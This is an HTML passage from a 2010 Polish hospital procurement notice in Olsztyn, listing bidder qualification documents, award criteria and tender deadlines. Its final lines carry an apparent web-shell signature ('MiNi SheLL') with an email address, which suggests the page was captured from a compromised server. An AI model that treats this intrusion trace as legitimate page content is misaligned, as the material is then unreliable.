<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 82</li>
<li>2 - Termin wykonania zamówienia - 18</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27, adres e-mail: zamowienia@szpital.olsztyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2010 godzina 10:00, miejsce: Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com